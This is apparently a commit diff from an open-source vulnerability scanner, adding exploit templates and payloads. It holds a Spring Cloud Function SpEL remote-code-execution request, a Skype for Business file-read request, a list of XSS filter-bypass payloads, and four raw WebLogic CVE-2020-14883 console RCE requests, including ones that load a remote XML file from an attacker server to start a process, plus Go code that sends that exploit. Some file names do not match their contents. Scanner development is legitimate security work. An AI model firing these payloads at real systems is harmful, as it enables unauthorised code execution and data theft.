add CVE-2022-26911.yaml 2022-11-10

Author: hktalent

.github/workflows/build.yml

@@ -43,6 +43,8 @@ jobs:
           fetch-depth: 0
       - name: Checkout submodules
         run: git submodule update --init --recursive
+      - name: Install cross-compiler for linux/arm64
+        run: sudo apt-get -y install gcc-aarch64-linux-gnu
       - name: Set up Go
         uses: actions/setup-go@v2
         with:

config/51pwn/CVE-2022-22963.yaml

@@ -0,0 +1,33 @@
+id: CVE-2022-22963_51pwn
+
+info:
+  name: spring cloud exp
+  author: Nicolas Krassas
+  severity: critical
+  description: RCE on Spring cloud function SPEL
+  reference: https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
+  tags: web,spring
+
+requests:
+- raw:
+  - |-
+    POST /functionRouter HTTP/1.1
+    Host: {{Hostname}}
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+    Accept-Encoding: gzip, deflate
+    Accept: */*
+    Connection: close
+    spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("whoami")
+    Accept-Language: en
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 4
+    test
+  matchers-condition: and
+  matchers:
+  - type: word
+    part: body
+    words:
+    - 'functionRouter'
+  - type: status
+    status:
+    - 500

config/51pwn/CVE-2022-26911.yaml

@@ -0,0 +1,24 @@
+id: CVE-2022-26911_51pwn
+info:
+  name: Arbitrary File Read on Skype For Business Server
+  author:
+  - 51pwn
+  description: |-
+    Arbitrary File Read on Skype For Business Server
+requests:
+  - raw:
+      - |
+        GET /RgsConfig/PlayWave.ashx?file=c:/wisdons/win.ini HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: status
+        status:
+        - 200
+      - type: word
+        condition: and
+        part: body
+        words:
+        - '[extensions]'
+    matchers-condition: and
+    redirects: false
+  

config/config.json

@@ -105,6 +105,7 @@
     "MaxRedirects": 3
   },
   "enableEsSv": true,
+  "enableJaeles": false,
   "CheckWeakPassword": true,
   "jaelesThread": 8,
   "esthread": 8,

config/xss/payload.json

@@ -0,0 +1,58 @@
+// Refereces:
+// https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/XSS%20injection
+// https://github.com/s0md3v/AwesomeXSS
+
+//"{{this+{0}+this}}",
+//"{this+{0}+this}",
+//"this+{0}+this"
+//" => \x22 \42 %22
+//' => \x27 \47 %27
+//< => \x3c \74 %3c
+//> => \x3e \76 %3e
+
+[
+  ';window.___xssSink({0});',
+  'javascript:window.___xssSink({0})',
+  'java%0ascript:window.___xssSink({0})',
+  'data:text/javascript;,window.___xssSink({0})',
+
+  '<iMg src=a oNerrOr=window.___xssSink({0})>',
+  '\\x3ciMg src=a oNerrOr=window.___xssSink({0})\\x3e',
+  '\\74iMg src=a oNerrOr=window.___xssSink({0})\\76',
+
+  "'><iMg src=a oNerrOr=window.___xssSink({0})>",
+  "\\x27\\x3E\\x3Cimg src=a oNerrOr=window.___xssSink({0})\\x3E",
+  "\\47\\76\\74img src=a oNerrOr=window.___xssSink({0})\\76",
+
+  '"><iMg src=a oNerrOr=window.___xssSink({0})>',
+  '\\x22\\x3e\\x3cimg src=a oNerrOr=window.___xssSink({0})\\x3e',
+  '\\42\\76\\74img src=a oNerrOr=window.___xssSink({0})\\76',
+
+  "'><iMg src=a oNerrOr=window.___xssSink({0})>",
+  '\\x27\\x3e\\x3cimg src=a oNerrOr=window.___xssSink({0})\\x3e',
+  '\\47\\76\\74img src=a oNerrOr=window.___xssSink({0})\\76',
+
+  '1 --><iMg src=a oNerrOr=window.___xssSink({0})>',
+  '1 --\\x3e\\x3ciMg src=a oNerrOr=window.___xssSink({0})\\x3e',
+  '1 --\\76\\74iMg src=a oNerrOr=window.___xssSink({0})\\76',
+
+  ']]><iMg src=a oNerrOr=window.___xssSink({0})>',
+  ']]\\x3e\\x3ciMg src=a oNerrOr=window.___xssSink({0})\\x3e',
+  ']]\\76\\74iMg src=a oNerrOr=window.___xssSink({0})\\76',
+
+  ' oNpasTe=window.___xssSink({0}) ',
+
+  '" oNpasTe=window.___xssSink({0}) a="',
+  '\\x22 oNpasTe=window.___xssSink({0}) a=\\x22',
+  '\\42 oNpasTe=window.___xssSink({0}) a=\\42',
+
+  "' oNpasTe=window.___xssSink({0}) a='",
+  "\\x27 oNpasTe=window.___xssSink({0}) a=\\x27",
+  "\\47 oNpasTe=window.___xssSink({0}) a=\\47",
+
+  // Bypass using javascript inside a string
+  "</scrIpt><scrIpt>window.___xssSink({0})</scrIpt>",
+  "\\x3c/scrIpt\\x3e\\x3cscript\\x3ewindow.___xssSink({0})\\x3c/scrIpt\\x3e",
+  "\\74/scrIpt\\76\\74script\\76window.___xssSink({0})\\74/scrIpt\\76",
+
+]

new.txt

@@ -1,4 +1,6 @@
-1、integrated jaeles，add new web PoCs 370，By default, nuclei is turned on and jaeles scanning is turned on
+https://github.com/psiinon/open-source-web-scanners
+
+1、add new web PoCs 370
 CRLF
 Dom-xss
 ErrorsAndVulns

open-source-web-scanners.md

@@ -0,0 +1,14 @@
+package weblogic
+
+// Shodan: product:"Oracle WebLogic"
+// Oracle-WebLogic-CVE-2022-21371
+// GET .//WEB-INF/web.xml
+// GET .//WEB-INF/portlet.xml
+// GET .//WEB-INF/weblogic.xml
+//GET .//META-INF/MANIFEST.MF
+//GET .//WEB-INF/web.xml
+//GET .//WEB-INF/portlet.xml
+//GET .//WEB-INF/weblogic.xml
+func DoCheck21371() {
+
+}

pocs_go/weblogic/CVE-2022_21371.go

@@ -4,6 +4,81 @@ import (
 	"github.com/hktalent/ProScan4all/lib/util"
 )
 
+/*
+Proof of Concept (PoC) 1: using tangosol.coherence.mvel2.sh.ShellSession() for Windows-based targets
+
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
+Proof of Concept (PoC) 2: using tangosol.coherence.mvel2.sh.ShellSession() for Linux-based targets
+
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/CVE-2020-14883.txt');")
+Proof of Concept (PoC) 3: using com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext for Windows-based targets
+
+Content of poc.xml file
+
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+            <list>
+                <value>cmd</value>
+                <value>/c</value>
+                <value>
+                    <![CDATA[calc]]>
+                </value>
+            </list>
+        </constructor-arg>
+    </bean>
+</beans>
+
+
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://yourserver:7575/poc.xml")
+Proof of Concept (PoC) 4: using com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext for Windows-based targets
+
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://yourserver:7575/poc.xml")
+*/
 func CVE_2020_14883(url string) bool {
 	if _, err := util.HttpRequset(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/testnmanp.txt%27);%22)", "GET", "", false, nil); err == nil {
 		if req2, err2 := util.HttpRequset(url+"/console/framework/skins/wlsconsole/css/testnmanp.txt", "GET", "", false, nil); err2 == nil {

pocs_go/weblogic/CVE_2020_14883.go

@@ -146,7 +146,9 @@ func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, o
 
 	// 启动web扫描
 	util.Wg.Add(1)
-	go jaeles.RunScan(a66, "")
+	if util.GetValAsBool("enableJaeles") {
+		go jaeles.RunScan(a66, "")
+	}
 
 	options.Targets = *x55
 	log.Printf("nuclei options.Targets = %+v\n", options.Targets)